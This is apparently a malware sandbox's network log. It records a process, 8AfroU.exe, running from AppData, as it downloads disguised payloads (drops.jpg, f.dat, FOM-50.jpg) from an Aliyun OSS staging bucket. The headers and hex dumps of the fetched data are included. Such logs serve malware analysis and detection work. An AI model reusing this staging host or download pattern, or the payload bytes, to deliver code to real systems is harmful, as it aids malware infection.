2024-10-02 02:28:15 UTC	114	OUT	GET /drops.jpg HTTP/1.1 User-Agent: GetData Host: 10mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2024-10-02 02:28:16 UTC	545	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 02 Oct 2024 02:28:15 GMT Content-Type: image/jpeg Content-Length: 37994 Connection: close x-oss-request-id: 66FCAFBF5C006933323380C9 Accept-Ranges: bytes ETag: "48BE934981499C0D8E119833616D5515" Last-Modified: Tue, 24 Sep 2024 05:52:21 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 9364005863903881328 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: SL6TSYFJnA2OEZgzYW1VFQ== x-oss-server-time: 1
2024-10-02 02:28:16 UTC	3551	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 06 00 00 00 f4 78 d4 fa 00 00 26 23 49 44 41 54 78 da ec c1 c1 2a 28 60 14 80 c1 ef 74 bb 29 2c d4 cf fb 97 a5 17 b3 96 c4 02 c7 de ce 52 66 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7e e0 61 ff 05 fc 59 d3 fd 63 c0 af 70 d5 5e 9c 9a d3 7e dc d5 9c 9a 53 9d 69 4f 33 b7 d5 a9 3d 55 ed 5c 34 7b 59 d5 76 5d fd 6f 9a 9a 9b be db 5e 6b df aa 9a 9e aa cf 76 de 9b 7d ae aa 5e fa 62 d7 7e 5a 64 0e 00 30 8e 7f 9f d9 3f 6c 6c 4c ab b4 1c b4 73 10 Data Ascii: PNGIHDRx&#IDATx*(`t),Rf&~aYcp^~SiO3=U\4{Yv]o^kv}^b~Zd0?llLs
2024-10-02 02:28:16 UTC	4096	IN	Data Raw: 34 39 7d 9f 9c ce 11 00 a0 d6 9c dc 1f a9 37 73 ef 63 00 38 fa d8 df ac 4f 0a 00 50 7f 4e ef d0 15 e9 56 81 01 40 fb aa 55 72 ba 44 00 80 22 b8 ac 8f 0b 0c 00 4e 99 0b 01 00 ca 72 bb 1e 1a ba 48 85 2b 7b 00 e8 df 75 a1 a4 55 02 00 94 c3 b9 c5 5a bc 68 8d 0a 57 f6 00 30 b5 f8 63 92 5b 22 00 40 51 9c cb f7 96 fe 65 c0 72 ff e3 73 76 ce e5 7b 04 00 28 90 bb 42 57 0e ff 9a 0a 56 ee 00 10 e2 2d 92 bb 52 00 80 22 b9 e9 b2 bf 03 56 ec 00 e0 5c 4f d1 ff e3 01 00 79 b5 1e 1e 3d 5f 85 2a 73 00 d8 3c fa 73 52 be 43 00 80 72 39 b7 54 8b 0e fc b6 0a 55 e6 00 30 31 71 8f e4 de 24 00 40 d1 9c eb f9 98 0a 55 e4 00 e0 a4 df 12 00 00 d2 d5 f2 e9 5a 15 a8 bc 01 c0 0f 5f 29 e7 ae 13 00 00 92 9c cb bf a9 02 95 37 00 b8 e9 bb 05 00 c0 ff 29 f2 be 50 dc 00 e0 94 ef 12 00 00 33 Data Ascii: 49}7sc8OPNV@UrD"NrH+{uUZhW0c["@Qersv{(BWV-R"V\Oy=_*s<sRCr9TU01q$@UZ_)7)P3
2024-10-02 02:28:16 UTC	4096	IN	Data Raw: 05 dc 01 96 9b d9 e3 92 8e 10 00 80 a7 fe 0b c4 bd ea d9 b1 b1 56 fd 33 01 00 a6 af ae 9f a8 97 1c 7b 9b 80 8e 52 d7 66 9e ef b3 94 6b 22 22 9a 72 3b 35 3c 76 a6 80 8e 74 f7 d6 93 cc f3 d6 42 17 17 11 51 b1 c9 e3 87 02 3a 5a ca d7 94 ba c0 88 88 0a ed 7e d5 75 67 9c cb 0c 1c 8c a5 3c 58 e8 22 23 22 2a 2b 8f 6d 7b af 9e 0a e8 0a d5 96 a5 96 f2 53 c5 2e 38 22 a2 12 f2 d8 a3 d4 b8 4c 40 57 19 da 7e ba a5 dc 2c 76 e1 11 11 cd 73 4a f9 a7 02 ba 52 95 af 36 8f 89 52 17 1f 11 d1 fc 15 7f e4 be 3f ba 9a a5 f8 65 99 8b 8f 88 68 9e f2 fc b4 06 f3 32 01 5d 6d 75 dd 67 29 df 5f ec 42 24 22 9a cb 3c bf 2e 8f e5 02 7a c2 9d cd e3 2c c5 f3 c5 2e 48 22 a2 b9 c8 63 42 1e d7 0b e8 29 55 3e cf 52 de 59 ec c2 24 22 9a fd 6e 17 d0 93 3c df 50 e8 a2 24 22 9a e5 e2 21 6d a8 17 Data Ascii: V3{Rfk""r;5<vtBQ:Z~ug<X"#"*+m{S.8"L@W~,vsJR6R?eh2]mug)_B$"<.z,.H"cB)U>RY$"n<P$"!m
2024-10-02 02:28:16 UTC	4096	IN	Data Raw: e4 84 01 ad 2f 48 41 6e 6f 70 71 3a b4 30 51 3e 77 78 79 7a 33 ff 01 5a 0f 80 f4 85 b0 44 6c c6 86 88 89 c2 00 c8 a9 fe c7 f3 d1 ae db 1f d9 b2 e7 d0 9a 52 d3 17 5c d6 16 e4 85 fa 1b ac a5 a6 a7 e0 c2 6a ab e4 26 e2 8b e8 3a 36 b2 3c b5 b6 b7 31 fd 9e 93 3f c1 9a 97 c0 b4 c5 f0 04 2c c6 c6 c8 c9 41 8f e8 e5 86 44 9c f5 a2 9b d7 1d 9e 5c 19 91 53 9f f8 ed 96 54 a4 c5 d2 68 a4 fd 6f a3 cc d1 a2 60 a8 c9 de 64 b0 d1 ba 78 b8 d1 86 bf fb 31 b2 70 3d b5 77 bb 24 41 c5 47 20 25 06 07 08 09 e1 01 87 49 2a 2f ef d1 9b 57 30 35 9d 53 3c 21 23 5f 38 3d 11 9c 84 21 22 23 6c ae 62 03 68 a2 2a 63 2f 69 0a 5f 78 b8 76 17 7c 7d bd 73 1c 79 72 b8 fc 39 76 b6 04 65 02 0b cf 01 62 0f 00 c0 0e 6f 1c 05 c5 03 74 01 ba 55 aa aa a9 dc 88 11 d1 17 78 0d b6 65 9e 9e 9d ea 20 41 Data Ascii: /HAnopq:0Q>wxyz3ZDlR\j&:6<1?,AD\STho`dx1p=w$AG %I/W05S<!#_8=!"#lbhc/i_xv\|}syr9vebotUxe A
2024-10-02 02:28:16 UTC	4096	IN	Data Raw: 67 5a af ee 4f f4 6d 6e 6f 23 b7 f6 57 ed 75 76 77 16 bf fe 5f e6 7d 7e 7f e1 47 06 a7 1f 85 86 87 f8 4f 0e af 10 8d 8e 8f e3 57 16 b7 09 95 96 97 f0 5f 1e bf 02 9d 9e 9f cf 67 26 87 3b a5 a6 a7 dc 6f 2e 8f 0c ad ae af b0 77 f6 97 f4 f6 70 f3 9c f8 d6 7d f8 99 fc d0 06 85 e6 80 b7 03 82 e3 8c ac 0c 8f e8 88 86 09 94 f5 94 b2 12 91 f2 90 b6 1f 9e ff 94 b9 18 9b c4 a8 8e 25 a0 c1 ac 82 2e ad ce a0 ec 2b aa cb 90 a5 34 b7 d0 94 9e 31 bc dd 98 89 3a b9 da 9c 65 c7 46 27 60 64 c0 43 2c 6c 6e cd 48 29 68 3c d6 55 36 74 26 d3 52 33 70 5f dc 5f 38 74 77 d9 64 05 48 51 e2 61 02 4c 5b ef 6e 0f 40 59 e8 6b 14 5c 32 f5 70 11 46 67 fe 7d 1e 4a 53 fb 7a 1b 32 32 84 07 60 36 32 81 0c 6d 3e 1f 8a 09 6a 3a 38 97 16 77 22 27 90 13 7c 2e 3f 9d 18 79 26 3e a6 25 46 1a 00 a3 Data Ascii: gZOmno#Wuvw_}~GOW_g&;o.wp}%.+41:eF'`dC,lnH)h<U6t&R3p__8twdHQaL[n@Yk\2pFg}JSz22`62m>j:8w"'\|.?y&>%F
2024-10-02 02:28:16 UTC	4096	IN	Data Raw: 67 9f 90 e1 a9 ef ad 0f 27 13 3d 56 53 3c fe 22 53 38 f1 7e 71 95 4c 81 80 7f c9 01 47 bc 46 4a 4b 44 45 46 47 40 c5 0f 63 c8 90 92 93 52 d1 b2 b7 df 5f de bf bd f8 58 db 84 83 d6 65 e0 81 85 f3 6e ed 8e 8f c9 6b ea 8b 95 dc 74 f7 90 93 c6 71 fc 9d 9d eb 7a f9 9a 97 a1 07 86 e7 ed b1 00 83 ec e3 a2 0d 88 e9 e5 8e 16 95 f6 ff d4 9d 5b 83 fc f9 92 56 d1 d1 06 20 1f 09 55 02 1b 1a ae 6e ac cd d2 a3 61 b9 ca af 49 f5 f3 f3 f4 0a a2 d3 c0 70 be df cc 7e 82 db 30 01 76 09 85 79 22 37 0c 08 0a 0b 7a 09 3d cf fb 14 5a 9e 50 31 56 5f 99 dd 42 1a 1c 1d dd d3 ec ed ee ef e8 e9 ea eb e4 e5 e6 e7 e0 65 ad c3 68 f7 76 17 0c 72 f0 73 1c 00 5f fd 78 19 04 4b 86 05 66 78 17 83 02 63 74 30 8c 0f 68 70 3d 89 14 75 6c 27 92 11 72 68 3d 9f 1e 7f 1c 30 98 1b 44 20 36 a5 20 41 Data Ascii: g'=VS<"S8~qLGFJKDEFG@cR_Xenktqz[V UnaIp~0vy"7z=ZP1V_Behvrs_xKfxct0hp=ul'rh=0D 6 A
2024-10-02 02:28:16 UTC	4096	IN	Data Raw: ab a4 a5 a6 a7 a0 29 e6 23 54 51 3e fa 30 51 6e 3f f1 2d 5e 6b 34 f4 32 5b 88 c9 01 6f 9c cd 0d c3 ac b9 c2 02 88 a9 65 84 d8 1a 96 b7 dc 6a 56 df 11 9d be d3 17 d9 ba b7 e8 98 a6 87 d7 9c a9 11 ec 8d 92 e3 27 a1 8a e7 3b e5 96 93 fc b6 67 ff 33 73 b5 05 b5 8e 76 34 01 89 49 cf e0 8d 4d 93 ec e9 82 c8 1d 85 45 05 58 d0 dd 65 90 f1 ee 29 18 51 9e ff e4 36 6f 97 63 25 fa 20 28 29 2a 2b 24 25 26 27 20 a1 67 ab d4 e9 ba 7a a0 d1 e6 bf 71 b5 de f3 b4 7e 12 97 c6 45 26 53 43 c3 42 23 59 6c cc 4f 28 5f 7a c9 54 35 41 43 d2 51 32 43 6a df 5e 3f 49 72 d8 5b 04 77 41 e5 60 01 71 42 ee 6d 0e 73 5f eb 6a 0b 69 42 f4 77 10 6f 7e f1 7c 1d 61 5e fa 79 1a 63 21 87 06 67 19 35 80 03 6c 17 4a 8d 08 69 0e 07 96 15 76 12 31 93 12 73 1a 38 9c 1f 78 1e 2e 99 24 45 26 22 a2 21 Data Ascii: )#TQ>0Qn?-^k42[oejV';g3sv4IMEXe)Q6oc% ()*+$%&' gzq~E&SCB#YlO(_zT5ACQ2Cj^?Ir[wA`qBms_jiBwo~\|a^yc!g5lJiv1s8x.$E&"!
2024-10-02 02:28:16 UTC	4096	IN	Data Raw: 67 68 21 e7 ff 48 dd 6e 6f 70 39 ff 7e 01 cd 89 88 90 59 b8 84 83 35 f7 fb a4 11 83 83 84 b6 54 cf 03 05 ae ab 8d 8d 8e 70 04 b5 02 92 94 95 1f 13 bc 91 9b 9b 9c 5b 1a bb 40 a1 a2 a3 e3 63 22 83 49 a9 aa ab c9 6b 2a 8b 52 b1 b2 b3 c0 73 32 93 5b b9 ba bb ec 7b 3a 9b 24 c1 c2 c3 b6 03 42 e3 2d c9 ca cb a3 0b 4a eb 36 d1 d2 d3 b7 13 52 f3 3f d9 da db b9 1b 5a fb 08 e1 e2 e3 97 23 62 c3 01 e9 ea eb 9f 2b 6a cb 1a f1 f2 f3 bc 33 72 d3 13 f9 fa fb 99 3b 7a db ec 01 02 03 65 c3 82 23 e5 09 0a 0b 7c cb 8a 2b fe 11 12 13 14 d3 52 33 68 51 dc 5f 38 6c 7b d9 64 05 50 42 e2 61 02 54 58 ef 6e 0f 58 6c e8 6b 14 44 5e f5 70 11 40 5b fe 7d 1e 4c 53 fb 7a 1b 38 22 84 07 60 3c 46 81 0c 6d 1a 03 8a 09 6a 1e 35 97 16 77 06 34 90 13 7c 0a 2a 9d 18 79 0a 19 a6 25 46 36 16 a3 Data Ascii: gh!Hnop9~Y5Tp[@c"IkRs2[{:$B-J6R?Z#b+j3r;ze#\|+R3hQ_8l{dPBaTXnXlkD^p@[}LSz8"`<Fmj5w4\|y%F6
2024-10-02 02:28:16 UTC	4096	IN	Data Raw: 77 69 69 6a 83 91 b2 91 90 fb f5 56 6f 75 75 76 fc f4 5d 5a 7a 7c 7d 3a f4 40 0a 53 cb 0f 09 a2 97 89 89 8a 63 d1 6d 71 70 d8 18 16 b7 ec 94 96 97 13 1d be 87 9d 9d 9e 14 2c 85 82 a2 a4 a5 8d 6f 23 68 29 43 a5 26 6e 24 3c 95 ae b2 b4 b5 3d 23 9c 99 bb bb bc 96 6f 34 0a 42 2b c6 4f 0c 82 4c 08 42 1b 83 47 41 ea b7 d1 d1 d2 3b 51 20 29 28 53 5d fe c7 dd dd de 54 6c c5 c2 e2 e4 e5 cd 2f 63 28 69 03 e9 66 2e ab 7b 31 ba 78 60 d1 8e f6 f8 f9 b2 76 70 d9 a2 ca 00 01 ea 15 e5 fa f9 4b 85 8d 2e cf 0c 0d 0e 47 9d 85 36 1b 16 15 16 5f 95 95 3e af 46 1d 1e f7 69 f6 dd dc b4 ae a2 03 ec 29 2a 2b 68 a6 ee 67 bb a5 16 3b 36 35 36 7f b5 b5 1e 13 3f 3d 3e d7 49 9f bd bc 0c c8 ca 63 28 48 4a 4b 04 c6 b7 07 db a1 eb 4b 54 55 56 a4 fc d2 de 7f 30 5c 5e 5f eb ed 46 13 65 65 Data Ascii: wiijVouuv]Zz\|}:@Scmqp,o#h)C&n$<=#o4B+OLBGA;Q )(S]Tl/c(if.{1x`vpK.G6_>Fi)*+hg;656?=>Ic(HJKKTUV0\^_Fee
2024-10-02 02:28:16 UTC	1675	IN	Data Raw: 43 5b 69 ac 2f 48 25 3d a9 34 55 3b 1b b2 31 52 3d 1d bf 3e 5f 37 11 b8 3b a4 cd ee 45 c0 a1 cb c2 4e cd ae c5 f4 4b ca ab df f4 54 d7 b0 c5 f5 51 dc bd cb ee 5a d9 ba cd d4 67 e6 87 f7 c0 60 e3 8c fd ef 6d e8 89 fb d7 76 f5 96 e5 f5 73 f2 93 ef b9 f2 36 e8 99 f6 f7 4d 8d e6 eb 2c 11 67 38 37 81 43 8f e8 ad 08 8b f4 f1 81 15 90 f1 f7 bb 1e 9d fe f9 b9 1b 9a fb c3 84 24 a7 c0 c1 96 21 ac cd cf eb a4 60 ba cb d0 b9 7f fe 01 62 09 08 10 59 5b 04 03 b5 77 bb 24 69 c4 47 20 3d 45 c1 4c 2d 33 67 ca 49 2a 35 7f d7 56 37 2f 66 d0 53 3c 25 7f dd 58 39 23 57 e6 65 06 1d 45 e3 62 03 17 47 ec 6f 08 6d 4a e9 74 15 73 5f f2 71 12 75 5d ff 7e 1f 7f 3d 76 b2 14 65 7a 0b c9 48 e5 d0 b7 b6 a2 05 ed b2 b1 07 d9 15 76 23 d7 29 72 0b 58 2c 6c d8 20 79 06 3b 1d 4e 2a ee e8 41 Data Ascii: C[i/H%=4U;1R=>_7;ENKTQZg`mvs6M,g87C$!`bY[w$iG =EL-3gI5V7/fS<%X9#WeEbGomJts_qu]~=vezHv#)rX,l y;NA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49745	118.178.60.61	443	4452	C:\Users\user\AppData\Roaming\8AfroU.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 02:28:18 UTC	110	OUT	GET /f.dat HTTP/1.1 User-Agent: GetData Host: 10mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2024-10-02 02:28:19 UTC	558	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 02 Oct 2024 02:28:19 GMT Content-Type: application/octet-stream Content-Length: 879 Connection: close x-oss-request-id: 66FCAFC338B0ED3037B04092 Accept-Ranges: bytes ETag: "886FA7DA4E35CC558232C567D89921B9" Last-Modified: Tue, 24 Sep 2024 07:51:52 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 18329505956248593569 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: iG+n2k41zFWCMsVn2JkhuQ== x-oss-server-time: 7
2024-10-02 02:28:19 UTC	879	IN	Data Raw: 0f 56 0e 57 66 34 65 31 31 31 31 31 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 31 57 57 57 57 31 31 31 Data Ascii: VWf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW111

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49746	118.178.60.61	443	4452	C:\Users\user\AppData\Roaming\8AfroU.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 02:28:21 UTC	115	OUT	GET /FOM-50.jpg HTTP/1.1 User-Agent: GetData Host: 10mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2024-10-02 02:28:22 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Wed, 02 Oct 2024 02:28:21 GMT Content-Type: image/jpeg Content-Length: 55085 Connection: close x-oss-request-id: 66FCAFC5F947FB3933978C77 Accept-Ranges: bytes ETag: "DC44AE348E6A74B3A74871020FDFAC74" Last-Modified: Tue, 24 Sep 2024 05:36:55 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 12339968747348072397 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 3ESuNI5qdLOnSHECD9+sdA== x-oss-server-time: 3
2024-10-02 02:28:22 UTC	3550	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2024-10-02 02:28:22 UTC	4096	IN	Data Raw: 7c 7b dc 41 c2 74 77 75 74 73 65 91 8f 90 91 11 ee 84 95 e3 bf 11 84 3e 34 dc 9d f4 97 48 c7 b1 a3 a4 fc 59 d2 a0 41 56 56 53 52 9d 74 f3 32 cf a3 b4 c1 be dd b0 51 f7 a8 bc bd e7 7c 28 d0 d2 c3 c4 06 4d 38 9d 42 26 a1 cc a7 ce 30 a5 d9 3a 10 2a 2a 29 54 1c d5 87 18 57 22 8b 54 0c 8b e2 89 e5 1a 93 ef 00 44 14 14 13 6e 2a e3 ad 32 98 f2 9e f5 9c f7 10 64 04 04 03 7e 3a f3 c3 6b 03 69 05 6f 06 ef 86 f7 f5 f4 8f c9 02 cc 9b ee 44 fb 09 1f 16 17 93 e9 4c f3 1d 06 1e 1f 76 c9 ae 39 24 25 70 cf c4 3a 2a 2b 7a c5 5f 35 30 31 64 db 68 2f 36 37 6e d1 7e 23 3c 3d 68 d7 be 40 42 43 12 ad 48 55 48 49 22 dc 5a 0d 4e a7 3f 58 52 53 d7 91 72 f4 54 f9 1a 5b 02 9e d5 a0 35 ea 8e 32 35 36 ed 3a 60 3f 3d 58 9a 5e 91 e6 0d 8d 49 6f 89 65 d6 37 78 0d 73 3c f5 00 82 fc 7f 96 Data Ascii: \|{Atwutse>4HYAVVSRt2Q\|(M8B&0:*)TW"TDn2d~:kioDLv9$%p:*+z_501dh/67n~#<=h@BCHUHI"ZN?XRSrT[5256:`?=X^Ioe7xs<
2024-10-02 02:28:22 UTC	4096	IN	Data Raw: 81 d9 46 b5 47 c8 2a 32 3c cc 8d d3 4c 5c f9 22 b5 d4 95 f2 68 ad 99 9a 9b 9c 16 da bb b0 28 ce 87 b4 28 ca 83 b8 82 4a f8 fa fa 0f ab 10 f1 b2 82 f1 49 85 72 e8 30 df 53 43 c8 46 34 85 3d 05 86 38 3b 39 38 37 40 8f 33 41 88 3e ab 73 d1 d2 d3 d4 16 5d 9a 28 bd 53 d6 dc dd de df b9 be bd bd bf 6e 03 ba b9 2a 26 27 20 21 22 23 3c 3d 3e 3f 38 7e 09 a2 73 15 79 17 e4 ae 75 a2 0c 57 89 70 0c 36 33 03 a8 49 0a 5c 87 0b c8 4a ef 11 d5 56 e0 14 16 17 18 94 61 0b 9f e5 e0 6b 2d aa 6c 27 27 ea 15 2b 10 c1 c9 c2 d3 d2 a5 61 3c ba 74 3b 37 fa 05 3b 00 d1 e9 d2 c3 c2 b5 7a 48 b7 02 47 22 4a c3 51 49 49 4a c0 01 5d c3 1a b8 d8 01 af df 0e 5a de 1d b1 d3 16 b0 de a5 a1 14 3e ef 2a 64 e8 62 3c e3 25 ec 7f e1 29 e8 7f f9 34 82 f8 74 fc 33 8f fd b0 0e 6f f7 aa 96 23 aa 81 Data Ascii: FG2<L\"h((JIr0SCF4=8;987@3A>s](Sn&' !"#<=>?8~syuWp63I\JVak-l''+a<t;7;zHG"JQIIJ]Z>*db<%)4t3o#
2024-10-02 02:28:22 UTC	4096	IN	Data Raw: b4 7b f0 8e 6c 82 e3 8e 63 f7 7e 71 70 c9 52 c4 f9 94 6a a3 4b 2c d9 9a 64 89 3d 1e df a0 24 62 d6 b2 4d ab 51 57 56 21 5b 53 b8 a6 2f f0 b1 e2 5b 09 40 49 48 31 bf e3 53 aa 4d 41 40 03 4a 3d 96 4f 29 4d 92 c0 9a 9c 9c ff 32 f5 18 a4 d6 59 8e d8 ee 09 a0 c6 31 03 2e 23 22 b4 c9 be 68 d2 b4 b3 b2 b1 b0 00 8b 1f 14 13 6e 2a fb 7b 37 ad ad af a8 35 7c 8d e9 c1 0c 89 fa cd 3f 66 88 00 e8 d0 8e cc 08 bf 0f 6c 82 0d 4c 4f 49 56 77 29 d4 60 16 5d 62 f6 2a da 20 c3 68 cd 79 a9 23 ca b3 d1 da d9 4d 0a 70 a3 23 a7 dc c5 9c bb ce 67 b8 d8 63 61 04 ce c6 4f 33 d4 84 23 3f 40 ca ba 1a c1 ba 33 60 71 4c 36 fd 0c 4d 38 50 06 ae 47 1f d4 15 56 da de b1 59 5b 5c 66 5b 23 d6 21 62 15 67 e6 ae 98 e3 99 e9 93 93 18 a4 e4 b7 2e 2c 2e b7 fe 89 22 f3 95 2c 2c 4f 8b 14 7f 7f f4 Data Ascii: {lc~qpRjK,d=$bMQWV![S/[@IH1SMA@J=O)M2Y1.#"hn{75\|?flLOIVw)`]b hy#Mp#gcaO3#?@3`qL6M8PGVY[\f[#!bg.,.",,O
2024-10-02 02:28:22 UTC	4096	IN	Data Raw: 82 84 85 0f ca 78 02 84 c2 05 c0 72 79 51 90 9d 16 47 97 96 97 cb 14 86 aa 17 8e 17 ca 54 2a f4 5f 2d f0 5e 2c fd 5d 23 f6 a0 5b 6c ae c5 c5 73 49 b0 ff 35 4d 87 cf b9 d1 83 e7 35 f4 c4 fa 89 cb b1 87 7d c7 c8 c9 4a 48 36 ed bd d6 5b 1b 01 38 59 99 d4 d3 2f 0a fb 87 64 99 20 d6 95 c2 69 ae ec c4 ff 0c f4 64 a0 0b 3f 06 63 a3 f2 f5 05 20 d5 69 4e 33 f8 f9 fa 05 f5 88 f8 74 4d 09 23 5a 00 8e 5b 0b 83 5a 02 80 57 09 85 42 ec 12 5f e7 9d 4f 12 9c 4d 15 91 41 18 96 4c 17 a9 72 2a aa 69 d9 ad f6 e9 d3 2e 61 af d7 11 59 33 5b 0d 69 bf 68 ce b4 db 38 b3 66 c8 32 bb b0 40 41 42 68 31 bd cd 1a b0 88 b1 4f 26 72 c7 3a 5c 1a 0c 68 8a 23 54 dc 86 5a 17 a3 d7 8c 9f a5 64 2b eb 2e 98 5e b0 11 6a e2 bc 50 b6 19 30 e4 3d 7d f9 02 70 4e 07 7f 0d 42 c4 7b 7c 7d fe fc 7b a1 Data Ascii: xryQGT_-^,]#[lsI5M5}JH6[8Y/d id?c iN3tM#Z[ZWB_OMALri.aY3[ih8f2@ABh1O&r:\h#TZd+.^jP0=}pNB{\|}{
2024-10-02 02:28:22 UTC	4096	IN	Data Raw: 96 50 05 c6 87 03 51 b1 54 f9 c1 b7 b2 40 27 d2 93 e0 a6 c0 7f 0c 42 65 64 c5 18 5e 90 25 d3 5d 5c 5b 2e e3 b7 93 6e a5 2f fc 52 51 50 77 b1 be b3 b4 b5 5f f2 47 46 45 88 43 36 cb b3 aa c5 2a 87 17 3a 39 9e 0b f2 15 be c1 46 8b df eb 16 a6 d5 13 d5 da d7 d8 d9 51 18 34 28 11 20 1f 22 88 f3 8c ad 70 a7 e8 01 49 24 13 12 65 b2 f8 74 29 86 fa 0a 83 fb 10 04 07 04 03 a4 17 33 01 01 02 88 71 09 83 f1 7d 05 59 e3 2f d2 f1 f0 49 f8 a5 12 14 15 95 2a a0 ae 5a 1b 1f 12 9b 8c 21 21 22 10 db ac 5b c3 ab d7 ca 24 ab a7 2f 2f 30 5b 36 db 99 e6 c9 c8 61 b0 47 c7 6f d5 d9 d1 bf be 1b ca 01 a5 7d 80 47 cd d4 4b 4c 4d 75 7a f0 e6 12 53 23 1c 00 04 08 b1 93 a8 a3 a2 dd 9b 6c e4 a2 17 61 ec 3b 83 83 5c 3c 83 f4 9b 91 90 29 f8 37 97 4f b2 02 50 f3 3a 86 33 47 bb 0c 7d 0b 47 Data Ascii: PQT@'Bed^%]\[.n/RQPw_GFEC6:9FQ4( "pI$et)3q}Y/IZ!!"[$//0[6aGo}GKLMuzS#la;\<)7OP:3G}G
2024-10-02 02:28:22 UTC	4096	IN	Data Raw: 8e 79 76 23 7b 77 ad 1f fb eb cd 8e 04 6f 66 4b 6c b0 18 b6 f0 d8 99 17 d2 9c 16 59 25 a3 a1 a2 a3 27 5c a2 d5 a4 2a 4a a8 87 65 51 8b 35 c5 d4 f3 b4 4a 92 3a c8 de fa bb 2c 39 d8 ff c0 69 a4 83 c4 15 a0 87 c8 43 8c c8 ef 1c 46 88 d3 52 3c d2 15 3c d4 54 37 d8 59 22 d4 af 6c 22 13 44 1e 1c c0 70 96 80 a8 e9 67 a2 ec 67 a8 ec d3 20 7a b4 f7 7f b0 f5 39 10 f8 73 bb ff 7d 11 02 82 ed 01 87 fc 0e 75 80 f4 f9 ae f0 f2 2a 9a 60 76 52 13 84 9f 50 14 3b c8 92 5c 1f 97 58 1d a8 66 20 a9 62 24 e7 ce 2a a1 6d 2a af c3 2d ac df 32 b1 ca 3c 3a b4 61 c7 c6 c5 c6 cf 98 c2 c0 64 d4 32 24 04 45 cb 0e 48 6d 2d 0b 4c 61 29 0f 50 65 35 13 54 69 31 17 58 1d 3d 1b 5c 11 39 1f 60 35 05 23 64 02 01 27 68 e2 2e e5 70 e4 2a e0 6c fa 36 fd 6c fc 32 f8 60 f2 3e f5 68 f4 3a f0 94 0a Data Ascii: yv#{wofKlY%'\JeQ5J:,9iCFR<<T7Y"l"Dpgg z9s}u`vRP;\Xf b$m-2<:ad2$EHm-La)Pe5Ti1X=\9`5#d'h.p*l6l2`>h:
